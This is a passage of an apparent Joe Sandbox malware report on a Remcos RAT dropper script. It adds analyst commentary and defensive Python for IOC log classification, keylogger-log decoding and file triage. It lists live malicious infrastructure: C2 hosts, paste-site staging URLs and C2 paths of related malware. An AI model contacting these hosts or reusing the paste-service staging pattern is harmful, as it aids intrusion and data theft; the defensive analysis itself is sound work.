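LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})$")


@dataclass(frozen=True)
class Alert:
    severity: str   # "critical", "high" or "medium"
    reason: str
    line: str


def _under(host: str, suffixes: set[str]) -> bool:
    """True if host equals, or is a subdomain of, any entry in suffixes."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(line: str) -> Optional[Alert]:
    """Return an Alert for one log line, or None if it matches no IOC."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None          # malformed line: ignore rather than crash
    _ts, proc, host, ip = m.groups()
    proc = proc.lower()
    host = host.lower().rstrip(".")   # DNS logs often carry a trailing dot
    from_script = proc in SCRIPT_HOSTS

    # Any process reaching the C2 name or address is an incident.
    if _under(host, C2_HOSTS) or ip in C2_IPS:
        return Alert("critical", "contact with C2 host flagged in report", line)
    # Paste service fetched by a script host: the stager pattern of this sample.
    if from_script and (_under(host, STAGING_HOSTS) or ip in STAGING_IPS):
        return Alert("high", f"{proc} fetching paste service (stager pattern)", line)
    # Script host resolving another dynamic-DNS label: worth a look, not an incident.
    if from_script and _under(host, DYNDNS_SUFFIXES):
        return Alert("medium", f"{proc} resolving dynamic-DNS host", line)
    return None


def scan(log: str) -> list[Alert]:
    """Classify every non-empty line of a log blob and return the alerts."""
    alerts = []
    for line in log.splitlines():
        if line.strip():
            a = classify(line)
            if a:
                alerts.append(a)
    return alerts


# Constructed sample telemetry (not captured from the sandbox run).
SAMPLE_LOG = """\
2024-10-31T06:41:10Z powershell.exe pastebin.com 104.20.3.235
2024-10-31T06:41:12Z powershell.exe - 188.114.97.3
2024-10-31T06:41:40Z AddInProcess32.exe sost.duckdns.org 181.236.112.169
2024-10-31T06:42:00Z chrome.exe pastebin.com 104.20.3.235
2024-10-31T06:42:03Z wscript.exe other.duckdns.org 203.0.113.10
2024-10-31T06:42:05Z svchost.exe ctldl.windowsupdate.com 203.0.113.20
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.severity}] {a.reason}: {a.line}")
```

The second sample line has no hostname, which is how a direct-to-IP connection shows up in many proxy logs; the IP fallback catches it, but only for a script host, so a browser hitting the same Cloudflare address stays silent.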
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545852
Start date and time: 2024-10-31 07:40:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: asegurar.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 49
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3548 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 980 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:41:04 | API Interceptor | 99x Sleep call for process: powershell.exe modified
02:41:53 | API Interceptor | 1628504x Sleep call for process: AddInProcess32.exe modified

AddInProcess32.exe is a legitimate, signed Microsoft .NET Framework helper. The API Interceptor shortens Sleep calls to defeat delay-based evasion, and 1.6 million of them inside that binary is not its normal behaviour; it is the process to dump when looking for the unpacked payload.
Similar samples matching on IP (Match | Associated sample name / URL | Detection | Threat name | Context):

104.20.3.235
  cr_asm3.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  cr_asm_atCAD.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv

164.132.58.105
  XS_Trade_AI-newest_release_.exe | malicious | LummaC
  sims-4-updater-v1.3.4.exe | malicious | Unknown
  RedEngine.exe | malicious | Babadeda, RedLine
  setup.exe | malicious | Babadeda, RHADAMANTHYS, RedLine
  8MO5hfPa8d.exe | malicious | AsyncRAT, Clipboard Hijacker
  SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe | malicious | AsyncRAT, Clipboard Hijacker
  DLL_Injector_Resou_nls..scr.exe | malicious | AsyncRAT, Clipboard Hijacker, zgRAT
  SynapseX_injector.exe | malicious | Python Stealer, MicroClip
  2PKbNS1Q41.exe | malicious | Python Stealer
  3yypk0NA7b.exe | malicious | Unknown

188.114.97.3
  lf1SPbZI3V.exe | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
  Comprobante de pago.xlam.xlsx | malicious | AgentTesla | paste.ee/d/vdlzo
  Purchase_Order_pdf.exe | malicious | FormBook | www.bayarcepat19.click/g48c/
  zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
  rPO-000172483.exe | malicious | FormBook | www.launchdreamidea.xyz/2b9b/
  rPO_28102400.exe | malicious | Lokibot | ghcopz.shop/ClarkB/PWS/fre.php
  PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
  SR3JZpolPo.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
  5Z1WFRMTOXRH6X21Z8NU8.exe | malicious | Unknown | artvisions-autoinsider.com/8bkjdSdfjCe/index.php
  PO 4800040256.exe | malicious | FormBook | www.cc101.pro/4hfb/
Similar samples matching on domain (Match | Associated sample name / URL | Detection | Threat name | Context):

rentry.org
  XS_Trade_AI-newest_release_.exe | malicious | LummaC | 164.132.58.105
  sims-4-updater-v1.3.4.exe | malicious | Unknown | 164.132.58.105
  RedEngine.exe | malicious | Babadeda, RedLine | 164.132.58.105
  AtlasLoader.exe | malicious | Unknown | 198.251.88.130
  AtlasLoader.exe | malicious | Unknown | 198.251.88.130
  LX.exe | malicious | Unknown | 198.251.88.130
  lucim.exe | malicious | Xmrig | 198.251.88.130
  Activator.exe | malicious | Xmrig | 198.251.88.130
  EzLoader.exe | malicious | RHADAMANTHYS, Xmrig | 198.251.88.130
  LolixLoader.exe | malicious | RHADAMANTHYS | 198.251.88.130

pastebin.com
  SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 104.20.4.235
  seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 172.67.19.24
  BL Packing List & Invoice.xls | malicious | Unknown | 104.20.4.235
  DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 104.20.4.235
  a1OueQJq4d.exe | malicious | DCRat | 172.67.19.24
  4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll | malicious | Unknown | 104.20.4.235
  loader.exe | malicious | Xmrig | 104.20.4.235
  SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe | malicious | Xmrig | 172.67.19.24
  6TCmDl2rFY.exe | malicious | DCRat | 104.20.4.235
  AF1cyL4cv6.vbs | malicious | AsyncRAT | 104.20.4.235

paste.ee
  Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 188.114.97.3
  EwKKdCrEDu.exe | malicious | Unknown | 188.114.96.3
  EwKKdCrEDu.exe | malicious | Unknown | 188.114.97.3
  transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 188.114.96.3
  Comprobante de pago.xlam.xlsx | malicious | Unknown | 188.114.97.3
  Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | 188.114.96.3
  seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 188.114.97.3
  necgoodthingswithgreatthingsentirethingstobeinonline.hta | malicious | Cobalt Strike | 188.114.97.3
  BL Packing List & Invoice.xls | malicious | Unknown | 188.114.97.3
  DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 188.114.96.3
Similar samples matching on ASN (Match | Associated sample name / URL | Detection | Threat name | Context). ASN-level matches are weak context: CLOUDFLARENET and OVH front enormous numbers of unrelated sites, so shared ASN says nothing about shared operators; the IP and domain matches above are the ones worth pivoting on.

CLOUDFLARENET (US)
  file.exe | malicious | LummaC | 188.114.96.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
  A & C Metrology OC 545714677889Materiale.xls | malicious | Remcos, HTMLPhisher | 104.21.74.191
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | 188.114.96.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer | 188.114.96.3
  file.exe | malicious | Stealc, Vidar | 172.64.41.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 188.114.97.3
  file.exe | malicious | Stealc | 172.64.41.3

COLOMBIATELECOMUNICACIONESSAESP (CO)
  jew.sh4.elf | malicious | Mirai | 190.254.50.103
  la.bot.sparc.elf | malicious | Unknown | 186.113.206.88
  la.bot.mips.elf | malicious | Unknown | 186.102.99.255
  la.bot.mipsel.elf | malicious | Unknown | 152.205.247.76
  la.bot.sparc.elf | malicious | Unknown | 190.254.50.177
  la.bot.arm5.elf | malicious | Unknown | 152.201.221.190
  nabmips.elf | malicious | Unknown | 152.203.19.145
  ppc.elf | malicious | Unknown | 152.204.126.56
  1730033107cd1f685dd343fb5289f0989ab1767df23f3b365f9ae4183bbc963b1c7d6b27ef552.dat-decoded.exe | malicious | Remcos | 186.169.46.48
  173003311009f4856d26633f5ec14546c9f54fd0a35c3ef95426fb756d9dfebe737a4ee690830.dat-decoded.exe | malicious | AsyncRAT, DcRat | 186.169.46.48

OVH (FR)
  file.exe | malicious | Xmrig | 51.79.145.202
  https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file | malicious | Unknown | 51.75.86.98
  http://199.59.243.227 | malicious | HTMLPhisher | 51.75.86.98
  https://gthr.uk/e8c3 | malicious | Unknown | 51.89.232.103
  20241029_163818.jpg | malicious | Unknown | 51.89.232.103
  jew.arm.elf | malicious | Unknown | 144.217.222.207
  jew.ppc.elf | malicious | Mirai | 37.59.96.120
  ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 51.81.194.202
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 147.135.36.89
  https://hianime.to | malicious | Unknown | 54.38.113.3
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped under their Match value)
3b5074b1b5d032e5620f69f9f700ff0e:
  nOrden_de_Compra___0001245.vbs | malicious | Remcos, GuLoader | 104.20.3.235, 164.132.58.105, 188.114.97.3
  file.exe | malicious | Stealc | 104.20.3.235, 164.132.58.105, 188.114.97.3
  file.exe | malicious | Unknown | 104.20.3.235, 164.132.58.105, 188.114.97.3
  file.exe | malicious | Unknown | 104.20.3.235, 164.132.58.105, 188.114.97.3
  Paiement.eml | malicious | HTMLPhisher | 104.20.3.235, 164.132.58.105, 188.114.97.3
  PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer | 104.20.3.235, 164.132.58.105, 188.114.97.3
  CPYEzG7VGh.exe | malicious | DCRat | 104.20.3.235, 164.132.58.105, 188.114.97.3
  https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9 | malicious | Unknown | 104.20.3.235, 164.132.58.105, 188.114.97.3
  SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | malicious | AgentTesla | 104.20.3.235, 164.132.58.105, 188.114.97.3
  http://ffcu.online | malicious | Unknown | 104.20.3.235, 164.132.58.105, 188.114.97.3

No context
Dropped file (path per the Yara hit source): C:\ProgramData\remcos\logs.dat
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.3378527165164744
Encrypted: false
SSDEEP: 3:rhlKlM+WlUlRlM6cl5JWRal2Jl+7R0DAlBG45klovDl6v:6lw2U5YcIeeDAlOWAv
MD5: 89DC9D2B4303A079557D9F80BC2F3D8C
SHA1: 8D300391D0496527067B748335A5D4029BC5D977
SHA-256: 279D73E7BAE3B6C3B7E70694969AC96CDA99C82FCE74A79EFCAF7F6732B67EB6
SHA-512: 860BF6186D77E34B0A2D0D4398BC488AA092E92BE943479C871E6CC8BC057844E497929730E536ABAD59F5F3F2A66D472343B1C6C37CD01951503DB8B9406819
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview (raw, non-printable bytes shown as dots): ....[.2.0.2.4./.1.0./.3.1. .0.2.:.4.1.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Preview decoded as UTF-16LE: [2024/10/31 02:41:21 Offline Keylogger Started] followed by [Program Manager]
This is the Remcos offline keylogger log, written by AddInProcess32.exe: the first bracketed line records when logging started, and the bracketed line after it is the title of the foreground window at the time ("Program Manager" is the Windows desktop), so the file shows which windows received keystrokes even before any typed text appears.
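Decoding this log is the first thing an incident responder does with a Remcos drop, since it shows which windows the victim typed into. The block below is an added example, not code from the report or from Remcos: it decodes a logs.dat-style UTF-16LE buffer and splits it into timestamped events, window titles and captured text. SAMPLE_LOG is constructed to match the preview above; its final unbracketed line, and the assumption that unbracketed lines are keystrokes, are mine.

```python
"""Decode a Remcos offline-keylogger log (logs.dat) and list its entries.

Added example, not part of the Joe Sandbox report or of Remcos. SAMPLE_LOG is
constructed to match the report's preview of C:\\ProgramData\\remcos\\logs.dat
(UTF-16LE text, bracketed lines); the trailing keystroke line is an assumed
addition, and treating unbracketed lines as captured keys is an assumption.
"""
import re

# Constructed: what the report's preview decodes to, plus one assumed keystroke line.
SAMPLE_LOG = (
    "\ufeff[2024/10/31 02:41:21 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n"
    "typed text (assumed)\r\n"
).encode("utf-16-le")

# "[YYYY/MM/DD HH:MM:SS <event>]" as in the preview's first line
EVENT_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
# "[<window title>]" as in the preview's second line
TITLE_RE = re.compile(r"^\[(.+)\]$")


def decode_log(data):
    """The preview shows UTF-16LE text; tolerate a leading BOM and bad bytes."""
    text = data.decode("utf-16-le", errors="replace")
    return text.lstrip("\ufeff")


def parse_entries(data):
    """Return tuples: ("event", ts, text), ("window", title) or ("keys", text)."""
    entries = []
    for line in decode_log(data).splitlines():
        line = line.strip()
        if not line:
            continue
        m = EVENT_RE.match(line)
        if m:
            entries.append(("event", m.group(1), m.group(2)))
            continue
        m = TITLE_RE.match(line)
        if m:
            entries.append(("window", m.group(1)))
            continue
        # Assumption: anything else is keystroke text captured under the last window.
        entries.append(("keys", line))
    return entries


def window_titles(data):
    """Titles of the windows that had focus while the keylogger was running."""
    return [e[1] for e in parse_entries(data) if e[0] == "window"]


if __name__ == "__main__":
    for entry in parse_entries(SAMPLE_LOG):
        print(entry)
```

Run it against a real logs.dat by replacing SAMPLE_LOG with the file's bytes; the window-title list is usually the fastest way to tell whether a password manager, mail client or bank session was open while the logger ran.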
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulp77th:NllU
MD5: 7B5F360646F3167812DC4ADF7B166512
SHA1: F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
SHA-256: 672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
SHA-512: 7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
Malicious: false
Preview: @...e.................................x..............@..........

Six dropped files with identical content and hashes, each written by powershell.exe:
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 82604
Entropy (8bit): 4.933268783138117
Encrypted: false
SSDEEP: 1536:yxkG9DytusrHiJZM2FeBZ0YNIIIlNsDf50jguaPCcl7wh6V8xPOr:M59Dpeir8ZRNIItzu4z7s+Br
MD5: E177873E2D842F08553C449F4758A4CE
SHA1: 91612A3524924E253495CBF1DD05AEFDFB118FFC
SHA-256: 970E00FFC2819C1F2D6FBE0C13E115B101F28108813B04ACFEE162043648E0EA
SHA-512: 2F38AC3FD5C68297DEA3538C74E327850F6CEC6C28326DA34FCD4AE7FCDD6D26DFE337498C5D44438006A231CDBA86DBB605F2CE3F8A66142600E50F13B447FC
Malicious: false
File type: Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
Entropy (8bit): 3.5702788509354697
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 66.67%
• MP3 audio (1001/1) 33.33%
File name: asegurar.vbs
File size: 15'016'182 bytes
MD5: aee210142f6411df0f3c0469d2a9df27
SHA1: 991b0e994e4da9f76bf9fd03bc3fef75dfd94590
SHA256: 3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
SHA512: 5199ec7836d07bfe4c48deb3d16993f45ffc9864c404330462f9698960f7a5272bc5a7fff56f4a0d9afa9df2c01271cd0b303004f874797e20ec997c3f55fae3
SSDEEP: 1536:lyyyyyyyyyyyyyyyyyyyyyyyryyyyyyyyyyyyyyyyyyyyyyycyyyyyyyyyyyyyyz:TZ5U
TLSH: A1E60113A759EF30DF56387370D37B975261E3BA199C489C60E8822828C59A347D1BFE
File Content Preview (raw, non-printable bytes shown as dots): ..........'. .4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4
Icon Hash: 68d69b8f86ab9a86
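Three of the figures above carry most of the triage signal for this sample: it is UTF-16 LE text (so ASCII-only string searches see mostly NUL bytes), it is 15 MB with an entropy of only 3.57, and its SSDEEP is almost entirely runs of one character while the content preview repeats the same few characters, which together indicate a small script bulked out with repetitive filler. The block below is an added example, not code from the report, that reproduces those three measurements on a local copy: a BOM-based encoding guess, 8-bit Shannon entropy (the quantity the report labels "Entropy (8bit)"), and the share of the file taken by its single most common fixed-size chunk. SAMPLE is constructed to mimic the sample's repetition; the chunk size and the flagging thresholds are my own choices.

```python
"""Static triage of a script sample: encoding from its BOM, 8-bit Shannon
entropy (the report's "Entropy (8bit)") and how much of the file is one
repeated chunk.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed:
a UTF-16LE buffer repeating one 16-character pattern 2000 times plus a short
tail, mimicking the repetitive preview and run-of-'y' SSDEEP of asegurar.vbs.
CHUNK and the thresholds in triage() are my own choices.
"""
import math
from collections import Counter

BOMS = {
    b"\xef\xbb\xbf": "utf-8-sig",
    b"\xff\xfe": "utf-16-le",
    b"\xfe\xff": "utf-16-be",
}
CHUNK = 64  # assumption: chunk size used for the repetition measure


def shannon_entropy(data):
    """Bits per byte: 0.0 when every byte is the same, 8.0 when all 256 values are equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def detect_bom(data):
    """Name of the text encoding implied by a leading byte-order mark, or None."""
    for bom, name in BOMS.items():
        if data.startswith(bom):
            return name
    return None


def repetition_ratio(data, chunk=CHUNK):
    """Fraction of fixed-size chunks that equal the single most common chunk."""
    chunks = [data[i:i + chunk] for i in range(0, len(data) - chunk + 1, chunk)]
    if not chunks:
        return 0.0
    return Counter(chunks).most_common(1)[0][1] / len(chunks)


def triage(data):
    """Summarise the three measurements and raise the two flags an analyst cares about."""
    enc = detect_bom(data)
    rep = repetition_ratio(data)
    flags = []
    if rep >= 0.5:  # assumption: half the file being one chunk means padding
        flags.append("padded: most of the file is one repeated chunk")
    if enc and enc.startswith("utf-16"):
        flags.append("utf-16 script: ASCII-only string scans will miss its content")
    return {
        "encoding": enc,
        "entropy": round(shannon_entropy(data), 4),
        "repetition": round(rep, 3),
        "flags": flags,
    }


# Constructed: BOM + a 16-char pattern (32 bytes in UTF-16LE) x 2000 + a 16-char tail.
SAMPLE = b"\xff\xfe" + ("'.4\".0@..@..@..@" * 2000 + "WScript.Echo 1\r\n").encode("utf-16-le")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Because 64 is a multiple of the 32-byte pattern period, every chunk after the first is byte-identical in the constructed sample and the repetition ratio is close to 1.0; on a real file choose a chunk size that is a multiple of the filler period, or try several, since a period that does not divide the chunk size spreads the identical content over many distinct chunks.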
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T07:41:19.134483+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP
2024-10-31T07:41:19.521177+0100 | 2020423 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:19.521177+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:21.752336+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:22.031540+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49741 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:23.610045+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49742 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:25.190506+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49743 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:26.756293+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49744 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:28.312938+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49745 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:29.875749+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49746 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:31.453622+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49747 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:33.953405+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49748 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:35.531715+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49749 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:37.109960+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49750 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:38.675448+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49751 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:40.234871+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49752 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:41.817111+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49753 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:43.391319+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49754 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:44.969400+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49755 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:46.532179+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49756 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:48.095206+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49757 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:49.656958+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49758 | 181.236.112.169 | 2001 | TCP
